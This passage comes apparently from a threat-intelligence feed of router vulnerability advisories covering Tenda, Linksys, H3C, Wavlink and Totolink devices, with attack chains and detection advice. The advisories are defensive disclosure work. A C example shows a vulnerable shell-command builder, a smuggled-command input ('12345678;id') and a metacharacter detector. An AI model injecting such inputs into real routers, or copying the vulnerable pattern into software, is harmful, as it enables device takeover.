execute arbitrary code by manipulating the 'dips' argument via a crafted HTTP request to `/goform/GstDhcpSetSer`.","title":"Tenda F456 Router Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-f456-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-6992"}],"_cs_exploited":false,"_cs_products":["MR9600 (2.0.6.206937)"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-6992","command-injection","router","rce"],"_cs_type":"advisory","_cs_vendors":["Linksys"],"content_html":"\u003cp\u003eA command injection vulnerability, CVE-2026-6992, affects the Linksys MR9600 router, specifically version 2.0.6.206937. The vulnerability resides in the JNAP Action Handler component within the \u003ccode\u003e/etc/init.d/run_central2.sh\u003c/code\u003e script. Attackers can remotely exploit this flaw by manipulating the \u003ccode\u003epin\u003c/code\u003e argument passed to the \u003ccode\u003eBTRequestGetSmartConnectStatus\u003c/code\u003e function. This allows for the execution of arbitrary operating system commands on the affected device. A public exploit is available, increasing the risk of exploitation. 
The vendor was notified but did not respond.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the Linksys MR9600 router.\u003c/li\u003e\n\u003cli\u003eThe JNAP Action Handler dispatches the request to the \u003ccode\u003e/etc/init.d/run_central2.sh\u003c/code\u003e script; the script path itself never appears in the request.\u003c/li\u003e\n\u003cli\u003eThe request invokes the \u003ccode\u003eBTRequestGetSmartConnectStatus\u003c/code\u003e action.\u003c/li\u003e\n\u003cli\u003eThe attacker places shell metacharacters and an OS command inside the \u003ccode\u003epin\u003c/code\u003e argument of that action.\u003c/li\u003e\n\u003cli\u003eThe script splices the \u003ccode\u003epin\u003c/code\u003e value into a shell command line without validating or quoting it.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands run with the privileges of the process that executes the script, potentially \u003ccode\u003eroot\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the router and can, for example, intercept network traffic or modify router settings.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-6992 allows a remote attacker to execute arbitrary commands on the Linksys MR9600 router. This can lead to a complete compromise of the device, allowing the attacker to monitor network traffic, change router configurations, or use the router as a foothold for further attacks within the network. 
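The defect in this brief (a request argument, `pin`, spliced into a shell command) and the `strcat/snprintf` case in the Wavlink WL-WN530H4 brief further down this page are the same bug. The C program below is an added example written for this page; it is not code from Linksys, Wavlink or the feed's Sigma rules. It puts the vulnerable snprintf-built command next to the two hardening steps (allowlist the value, then pass it as an argv element rather than through a shell) and implements the recommendation to check the decoded `cs-uri-query` for shell metacharacters. The command name `smartconnect_status`, the 8-digit PIN format and the sample query strings are assumptions, not details from the advisory.

```c
/* Added example for this page: a request argument spliced into a shell
 * command (the Linksys `pin` case, and the Wavlink strcat/snprintf case).
 * Not vendor firmware; command name, PIN format and samples are assumptions.
 * Build: cc -Wall -o cmdinj cmdinj.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* VULNERABLE: the value goes straight into a command string destined for
 * the shell. Returned instead of executed so it can be inspected. */
static const char *build_cmd_vuln(const char *pin)
{
    static char cmd[256];
    snprintf(cmd, sizeof cmd, "/usr/sbin/smartconnect_status %s", pin);
    /* system(cmd);   <- a pin of "12345678;id" also runs `id` */
    return cmd;
}

/* HARDENED (1): allowlist. Assumes a WPS-style 8-digit PIN; anything else
 * is rejected before any command is assembled. */
static int pin_is_valid(const char *pin)
{
    size_t n = strlen(pin);
    if (n != 8)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (!isdigit((unsigned char)pin[i]))
            return 0;
    return 1;
}

/* HARDENED (2): even a validated value is passed as its own argv element
 * (execv/posix_spawn), never through a shell, so metacharacters are inert.
 * Returns the argv vector, or NULL if the pin was rejected. */
static const char **build_argv_safe(const char *pin)
{
    static const char *argv[3];
    if (!pin_is_valid(pin))
        return NULL;
    argv[0] = "/usr/sbin/smartconnect_status";
    argv[1] = pin;
    argv[2] = NULL;
    return argv;
}

/* DETECTION: percent-decode the logged query before matching, otherwise
 * "%3B" (';') and "%60" ('`') slip past a rule written against raw text. */
static void url_decode(char *dst, size_t dstsz, const char *src)
{
    size_t o = 0;
    for (; *src && o + 1 < dstsz; src++) {
        if (*src == '%' && isxdigit((unsigned char)src[1]) &&
            isxdigit((unsigned char)src[2])) {
            char hex[3] = { src[1], src[2], '\0' };
            dst[o++] = (char)strtol(hex, NULL, 16);
            src += 2;
        } else if (*src == '+') {
            dst[o++] = ' ';
        } else {
            dst[o++] = *src;
        }
    }
    dst[o] = '\0';
}

/* Returns the first shell metacharacter found in any decoded parameter
 * value of cs-uri-query, or 0 if none. Only values are inspected, so the
 * '&' separating parameters does not trigger it. */
static char query_shell_meta(const char *query)
{
    static const char meta[] = ";|&`$(){}<>\n";
    for (const char *p = query; p; ) {
        const char *amp = strchr(p, '&');
        size_t len = amp ? (size_t)(amp - p) : strlen(p);
        char raw[1024], dec[1024];
        if (len >= sizeof raw)
            len = sizeof raw - 1;           /* clamp; a prefix is still checked */
        memcpy(raw, p, len);
        raw[len] = '\0';
        const char *eq = strchr(raw, '=');
        url_decode(dec, sizeof dec, eq ? eq + 1 : raw);
        for (const char *s = dec; *s; s++)
            if (strchr(meta, *s))
                return *s;
        p = amp ? amp + 1 : NULL;
    }
    return 0;
}

int main(void)
{
    /* constructed samples, not captured traffic */
    const char *benign = "action=BTRequestGetSmartConnectStatus&pin=12345678";
    const char *evil   = "action=BTRequestGetSmartConnectStatus&pin=12345678%3Bid";
    printf("vuln cmd : %s\n", build_cmd_vuln("12345678;id"));
    printf("valid    : %d %d\n", pin_is_valid("12345678"), pin_is_valid("12345678;id"));
    printf("argv     : %s\n", build_argv_safe("12345678;id") ? "built" : "rejected");
    printf("meta     : benign=%d evil='%c'\n", query_shell_meta(benign), query_shell_meta(evil));
    return 0;
}
```

The allowlist alone is enough to stop this particular injection, but argv-style execution is the change that survives the next parameter someone forgets to validate; the detection side decodes before matching for the same reason an attacker encodes.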
Given the availability of a public exploit, the risk of widespread exploitation is high.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect CVE-2026-6992 Exploitation Attempt\u003c/code\u003e to identify exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eApply the Sigma rule \u003ccode\u003eDetect Suspicious Shell Activity via Web Request\u003c/code\u003e to detect potential command injection attempts.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for JNAP requests whose \u003ccode\u003ecs-uri-query\u003c/code\u003e (or body) carries shell metacharacters such as \u003ccode\u003e;\u003c/code\u003e, \u003ccode\u003e|\u003c/code\u003e, \u003ccode\u003e$(\u003c/code\u003e or backticks in the \u003ccode\u003epin\u003c/code\u003e value; URL-decode the field before matching, and do not key the rule on \u003ccode\u003e/etc/init.d/run_central2.sh\u003c/code\u003e, which is executed on the device and never appears in the request URI.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-26T12:00:00Z","date_published":"2026-04-26T12:00:00Z","id":"/briefs/2026-04-linksys-rce/","summary":"CVE-2026-6992 is a command injection vulnerability in the Linksys MR9600 router that allows remote attackers to execute arbitrary OS commands by manipulating the 'pin' argument in the BTRequestGetSmartConnectStatus function.","title":"Linksys MR9600 Command Injection Vulnerability (CVE-2026-6992)","url":"https://feed.craftedsignal.io/briefs/2026-04-linksys-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7033"}],"_cs_exploited":false,"_cs_products":["F456 1.0.0.5"],"_cs_severities":["critical"],"_cs_tags":["buffer-overflow","remote-code-execution","cve-2026-7033","router"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA buffer overflow vulnerability has been identified in Tenda F456 router, specifically version 1.0.0.5. The vulnerability resides within the \u003ccode\u003efromSafeClientFilter\u003c/code\u003e function located in the \u003ccode\u003e/goform/SafeClientFilter\u003c/code\u003e file. Successful exploitation allows a remote attacker to inject and execute arbitrary code. 
Publicly available exploit code exists, increasing the risk of widespread exploitation targeting vulnerable Tenda F456 devices. This issue poses a significant threat to network security, as a compromised router can lead to data breaches, denial of service, or further network intrusion.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Tenda F456 router running firmware version 1.0.0.5 exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/SafeClientFilter\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a specially designed payload within the \u003ccode\u003emenufacturer/Go\u003c/code\u003e argument. This payload is designed to trigger a buffer overflow in the \u003ccode\u003efromSafeClientFilter\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromSafeClientFilter\u003c/code\u003e function processes the malicious input without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe oversized payload overwrites adjacent memory regions, potentially including return addresses or other critical data.\u003c/li\u003e\n\u003cli\u003eWhen the \u003ccode\u003efromSafeClientFilter\u003c/code\u003e function attempts to return, the overwritten return address is used, redirecting execution flow to attacker-controlled memory.\u003c/li\u003e\n\u003cli\u003eThe attacker-controlled memory contains shellcode or other malicious instructions.\u003c/li\u003e\n\u003cli\u003eThe router executes the attacker\u0026rsquo;s code, granting the attacker control over the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can result in complete compromise of the Tenda F456 router. 
An attacker can gain unauthorized access to network traffic, modify router settings, or use the compromised device as a launchpad for further attacks within the network. Given the public availability of exploit code, a large number of Tenda F456 routers could be targeted, potentially affecting numerous home and small business networks. A successful attack could lead to data theft, service disruption, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply any available patches or firmware updates released by Tenda to address CVE-2026-7033 on the F456 1.0.0.5 routers.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection systems (IDS) or intrusion prevention systems (IPS) rules to detect and block malicious requests targeting the \u003ccode\u003e/goform/SafeClientFilter\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to your SIEM to detect exploitation attempts targeting the vulnerable endpoint.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/SafeClientFilter\u003c/code\u003e with abnormally large \u003ccode\u003emenufacturer/Go\u003c/code\u003e argument values.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-26T11:16:06Z","date_published":"2026-04-26T11:16:06Z","id":"/briefs/2026-04-tenda-buffer-overflow/","summary":"A buffer overflow vulnerability in Tenda F456 router version 1.0.0.5 allows a remote attacker to execute arbitrary code by exploiting the fromSafeClientFilter function in the /goform/SafeClientFilter endpoint through manipulation of the 'menufacturer/Go' argument.","title":"Tenda F456 Router Buffer Overflow 
Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["tenda","router","buffer_overflow","cve-2026-6631","webserver"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-6631 is a critical buffer overflow vulnerability affecting Tenda F451 routers running firmware version 1.0.0.7_cn_svn7958. The vulnerability resides in the \u003ccode\u003efromwebExcptypemanFilter\u003c/code\u003e function within the \u003ccode\u003e/goform/webExcptypemanFilter\u003c/code\u003e component of the router\u0026rsquo;s \u003ccode\u003ehttpd\u003c/code\u003e web server. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted HTTP request with an overly long \u0026lsquo;page\u0026rsquo; parameter. Publicly available exploits exist, increasing the risk of widespread exploitation. Successful exploitation allows attackers to execute arbitrary code on the router, potentially leading to full device compromise and network access.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Tenda F451 router exposed to the internet.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious HTTP GET or POST request targeting \u003ccode\u003e/goform/webExcptypemanFilter\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes the \u003ccode\u003epage\u003c/code\u003e parameter with a payload exceeding the buffer size allocated for it.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehttpd\u003c/code\u003e server processes the request and passes the \u003ccode\u003epage\u003c/code\u003e parameter to the vulnerable \u003ccode\u003efromwebExcptypemanFilter\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eDue to the lack of proper bounds checking, the overly long 
\u003ccode\u003epage\u003c/code\u003e parameter overwrites adjacent memory regions on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker carefully designs the overflow payload to overwrite the return address on the stack with the address of malicious code injected elsewhere in memory.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromwebExcptypemanFilter\u003c/code\u003e function completes execution and attempts to return, jumping to the attacker-controlled address.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s malicious code executes with the privileges of the \u003ccode\u003ehttpd\u003c/code\u003e server, potentially gaining full control of the router.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-6631 allows remote attackers to execute arbitrary code on vulnerable Tenda F451 routers. This can lead to complete device compromise, allowing attackers to modify router settings, intercept network traffic, or use the router as a point of entry for further attacks on the internal network. Given the widespread use of Tenda routers, a large number of devices could be vulnerable, potentially impacting both home and small business networks. 
The availability of public exploits further increases the likelihood of exploitation.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available firmware updates from Tenda to patch CVE-2026-6631.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests to \u003ccode\u003e/goform/webExcptypemanFilter\u003c/code\u003e with unusually long \u003ccode\u003epage\u003c/code\u003e parameters, using the Sigma rule \u003ccode\u003eDetectTendaF451BufferOverflow\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy a network IDS/IPS signature for oversized \u003ccode\u003epage\u003c/code\u003e values sent to \u003ccode\u003e/goform/webExcptypemanFilter\u003c/code\u003e; only an inline IPS can block the request, an IDS can only alert on it.\u003c/li\u003e\n\u003cli\u003eConsider deploying the Sigma rule \u003ccode\u003eDetectTendaF451SuspiciousProcess\u003c/code\u003e to identify unexpected processes spawned by the httpd daemon.\u003c/li\u003e\n\u003cli\u003eIf patching is not immediately feasible, consider restricting access to the router\u0026rsquo;s web interface from the public internet to mitigate the risk of remote exploitation.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-20T11:16:19Z","date_published":"2026-04-20T11:16:19Z","id":"/briefs/2026-04-tenda-f451-buffer-overflow/","summary":"A buffer overflow vulnerability (CVE-2026-6631) in Tenda F451 router version 1.0.0.7_cn_svn7958 allows remote attackers to execute arbitrary code by manipulating the 'page' argument in the /goform/webExcptypemanFilter component.","title":"Tenda F451 Router Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-f451-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6581"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-6581","buffer-overflow","router","h3c"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, identified as CVE-2026-6581, affects 
H3C Magic B1 routers up to version 100R004. The vulnerability resides in the \u003ccode\u003eSetMobileAPInfoById\u003c/code\u003e function within the \u003ccode\u003e/goform/aspForm\u003c/code\u003e file. An attacker can exploit this flaw by crafting a malicious request that manipulates the \u003ccode\u003eparam\u003c/code\u003e argument, leading to a buffer overflow and potential remote code execution. This vulnerability is particularly concerning because a public exploit is available, increasing the risk of widespread exploitation. The vendor was notified about the vulnerability but has not responded. Given the ease of exploitation and the potential for complete system compromise, organizations using affected H3C routers should take immediate action.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable H3C Magic B1 router running a firmware version up to 100R004.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/aspForm\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe request includes the \u003ccode\u003eSetMobileAPInfoById\u003c/code\u003e function call with an overly long value for the \u003ccode\u003eparam\u003c/code\u003e argument, triggering the buffer overflow.\u003c/li\u003e\n\u003cli\u003eThe overflow overwrites adjacent memory regions, including the return address on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker sets the overwritten return address to point to attacker-controlled code or a ROP chain.\u003c/li\u003e\n\u003cli\u003eWhen the \u003ccode\u003eSetMobileAPInfoById\u003c/code\u003e function returns, execution jumps to the attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s code executes with elevated privileges, potentially allowing full control of the router.\u003c/li\u003e\n\u003cli\u003eThe attacker can then use the compromised router to 
establish a foothold within the network, exfiltrate data, or launch further attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-6581 allows a remote attacker to execute arbitrary code with root privileges on the H3C Magic B1 router. This can lead to complete compromise of the device, allowing the attacker to control network traffic, exfiltrate sensitive data, or use the router as a jumping-off point for further attacks within the network. Given the widespread use of these routers in small to medium-sized businesses and homes, a large number of devices are potentially vulnerable. There is no indication of victim counts or sectors targeted at this time.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect H3C Magic B1 Buffer Overflow Attempt\u003c/code\u003e to your SIEM to detect exploitation attempts targeting CVE-2026-6581 via suspicious HTTP POST requests to \u003ccode\u003e/goform/aspForm\u003c/code\u003e (see Sigma rule below).\u003c/li\u003e\n\u003cli\u003eThe fix (bounds-checking the \u003ccode\u003eparam\u003c/code\u003e value before it is copied into a fixed-size buffer) can only come from H3C in a firmware update; the embedded web server is not something an operator can patch. Until an update exists, keep \u003ccode\u003e/goform/aspForm\u003c/code\u003e unreachable from the WAN and from untrusted internal segments.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unusual activity originating from H3C Magic B1 routers.\u003c/li\u003e\n\u003cli\u003eConsider replacing H3C Magic B1 routers with more secure alternatives if updates are not available.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-19T23:16:33Z","date_published":"2026-04-19T23:16:33Z","id":"/briefs/2026-04-h3c-magic-b1-overflow/","summary":"A buffer overflow vulnerability (CVE-2026-6581) in H3C Magic B1 routers allows remote attackers to execute arbitrary code by manipulating the 'param' argument in the SetMobileAPInfoById function.","title":"H3C Magic B1 Router Buffer Overflow 
Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-h3c-magic-b1-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6560"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["buffer overflow","cve-2026-6560","h3c","router","network device"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability (CVE-2026-6560) has been identified in H3C Magic B0 routers, specifically in versions up to 100R002. The vulnerability resides within the \u003ccode\u003eEdit_BasicSSID\u003c/code\u003e function of the \u003ccode\u003e/goform/aspForm\u003c/code\u003e file. An attacker can remotely exploit this flaw by crafting malicious input to the \u003ccode\u003eparam\u003c/code\u003e argument, leading to arbitrary code execution on the device. Public exploits are reportedly available, increasing the risk of widespread exploitation. The vendor was notified about this vulnerability, but has not provided any response or patch as of April 2026. 
This poses a significant risk to users of the affected H3C Magic B0 routers.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable H3C Magic B0 router running firmware version 100R002 or earlier.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/aspForm\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe POST request includes the \u003ccode\u003eEdit_BasicSSID\u003c/code\u003e function call.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eparam\u003c/code\u003e argument within the POST data contains a specially crafted string exceeding the buffer size allocated in the \u003ccode\u003eEdit_BasicSSID\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow occurs when the \u003ccode\u003eEdit_BasicSSID\u003c/code\u003e function processes the oversized \u003ccode\u003eparam\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe overflow overwrites adjacent memory regions, potentially including the return address on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the program execution flow.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code on the router, potentially gaining full control of the device, exfiltrating data, or using it as a pivot point for further attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability (CVE-2026-6560) allows a remote attacker to execute arbitrary code on the affected H3C Magic B0 router. This could lead to a complete compromise of the device, including the ability to modify router settings, intercept network traffic, and potentially gain access to connected devices on the network. 
Given the availability of public exploits, widespread exploitation is possible, potentially impacting a large number of home and small business networks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/aspForm\u003c/code\u003e with unusually long \u003ccode\u003eparam\u003c/code\u003e arguments.\u003c/li\u003e\n\u003cli\u003eRate limiting requests to \u003ccode\u003e/goform/aspForm\u003c/code\u003e does not stop this bug (a single oversized request is enough); restrict access to the management interface to trusted hosts instead, and never expose it on the WAN.\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect exploitation attempts targeting the vulnerable \u003ccode\u003eEdit_BasicSSID\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eUntil a patch is available, isolate affected H3C Magic B0 devices on their own segment and block access to their management interface from the WAN and from untrusted hosts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-19T07:16:05Z","date_published":"2026-04-19T07:16:05Z","id":"/briefs/2026-04-h3c-magic-buffer-overflow/","summary":"A buffer overflow vulnerability (CVE-2026-6560) in H3C Magic B0 up to 100R002 allows remote attackers to execute arbitrary code by manipulating the 'param' argument in the Edit_BasicSSID function of the /goform/aspForm file.","title":"H3C Magic B0 Router Buffer Overflow Vulnerability (CVE-2026-6560)","url":"https://feed.craftedsignal.io/briefs/2026-04-h3c-magic-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-6483"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","router","cve-2026-6483"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA high-severity (CVSS 7.2) OS command injection vulnerability, tracked as CVE-2026-6483, has been identified in Wavlink WL-WN530H4 routers running firmware version 20220721. 
The flaw resides in \u003ccode\u003e/cgi-bin/internet.cgi\u003c/code\u003e, in the code that assembles an OS command string from request input with \u003ccode\u003estrcat\u003c/code\u003e and \u003ccode\u003esnprintf\u003c/code\u003e (the advisory names the location as \u003ccode\u003estrcat/snprintf\u003c/code\u003e; these are the libc string functions used to build the command, not a function of the CGI binary itself). Successful exploitation enables remote attackers to execute arbitrary OS commands on the affected device. The vulnerability is triggered by supplying request input that reaches that command builder unsanitized. A public exploit is available, increasing the risk of widespread exploitation. Users are advised to upgrade to version 2026.04.16 to mitigate the risk. This vulnerability poses a significant threat due to the potential for complete system compromise, potentially leading to data exfiltration, device hijacking, or denial-of-service attacks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Wavlink WL-WN530H4 router running firmware version 20220721.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/cgi-bin/internet.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request carries a parameter value containing shell metacharacters and the commands the attacker wants to run.\u003c/li\u003e\n\u003cli\u003eThe handler concatenates the attacker-controlled value into a command string with \u003ccode\u003estrcat\u003c/code\u003e/\u003ccode\u003esnprintf\u003c/code\u003e without validating or quoting it.\u003c/li\u003e\n\u003cli\u003eThe assembled string is passed to the shell, resulting in OS command injection.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary OS commands with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker can leverage the compromised system to perform actions such as modifying router configuration, installing malware, or pivoting to other network devices.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access and control over the router.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary OS commands on the affected Wavlink router. This can lead to a complete compromise of the device, allowing the attacker to modify router settings, intercept network traffic, or use the router as a launchpad for further attacks within the network. No victim counts or targeted sectors have been reported; since these are consumer and small-business routers, the population of exposed devices is potentially large.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Wavlink WL-WN530H4 router to firmware version 2026.04.16 to patch CVE-2026-6483.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Wavlink Command Injection Attempt\u0026rdquo; to monitor for malicious requests targeting \u003ccode\u003e/cgi-bin/internet.cgi\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/cgi-bin/internet.cgi\u003c/code\u003e whose parameters carry shell metacharacters (URL-decode before matching), and watch for unexpected child processes of the web server, which indicate exploitation has already succeeded.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-17T11:16:11Z","date_published":"2026-04-17T11:16:11Z","id":"/briefs/2026-04-wavlink-command-injection/","summary":"A remote command injection vulnerability exists in the Wavlink WL-WN530H4 router, specifically in the `strcat/snprintf` function of the `/cgi-bin/internet.cgi` file, allowing attackers to execute arbitrary OS commands.","title":"Wavlink WL-WN530H4 OS Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-wavlink-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6194"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-6194","buffer-overflow","totolink","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-6194 describes a stack-based buffer overflow 
vulnerability present in Totolink A3002MU router firmware version B20211125.1046. The vulnerability resides within the HTTP Request Handler, specifically in the \u003ccode\u003esub_410188\u003c/code\u003e function of the \u003ccode\u003e/boafrm/formWlanSetup\u003c/code\u003e file. A remote attacker can exploit this vulnerability by crafting a malicious HTTP request that manipulates the \u003ccode\u003ewan-url\u003c/code\u003e argument, leading to arbitrary code execution on the device. Publicly available exploit code increases the likelihood of exploitation. Successful exploitation allows an attacker to compromise the device and potentially gain control of the network.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Totolink A3002MU router running firmware B20211125.1046.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/boafrm/formWlanSetup\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a \u003ccode\u003ewan-url\u003c/code\u003e argument with a payload exceeding the buffer size allocated for it in the \u003ccode\u003esub_410188\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe HTTP Request Handler processes the request and calls the vulnerable \u003ccode\u003esub_410188\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eDue to insufficient bounds checking, the oversized \u003ccode\u003ewan-url\u003c/code\u003e argument overflows the stack buffer.\u003c/li\u003e\n\u003cli\u003eThe attacker overwrites critical data on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eUpon returning from the \u003ccode\u003esub_410188\u003c/code\u003e function, execution is redirected to an attacker-controlled address.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code, potentially gaining full control of the 
